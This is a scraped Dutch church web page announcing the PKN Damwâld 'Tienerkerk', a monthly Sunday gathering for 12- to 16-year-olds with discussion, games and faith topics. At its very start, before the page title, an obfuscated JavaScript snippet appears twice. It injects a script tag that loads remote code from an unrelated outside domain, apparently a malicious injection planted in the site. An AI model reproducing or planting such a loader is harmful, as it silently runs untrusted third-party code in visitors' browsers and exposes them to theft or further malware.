;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Tienerkerk - PKN Damwâld
Tienerkerk

Welkom (terug) bij de Tienerkerk! Tienerkerk is het vervolg op BLITS! Zoals de naam al verklapt: het is een speciale bijeenkomst voor (en door) Tieners in de leeftijd van 12 tot 16 jaar (middelbare schoolleeftijd). De bijeenkomsten worden elke eerste zondag van de maand van 09.15 -10.30 uur gehouden.

Wat gaan we doen? Er is tijd om met elkaar de diepte in te gaan en om plezier te maken. Aan de hand van actuele onderwerpen en vragen leggen wij de verbinding met het geloof en/of de Bijbel. Dat doen we via gesprek, maar ook via (samen)spel en niet te vergeten: met veel humor. Wij kijken uit naar een nieuw seizoen met jullie en hopen dat jullie weer naar de Tienerkerk komen om daar jullie wijsheid, gezelligheid en talenten met elkaar te delen. Samen maken we er mooie ontmoetingen van! Dus: jij komt toch ook?!

Nieuwsgierig? Er bestaat een Instagram account die je kunt herkennen aan ons logo, dus volg ons!

Heb je nog vragen of ideeën, die kun je ons altijd mailen via tienerkerkdamwald@gmail.com

YO!  …  see you.

banner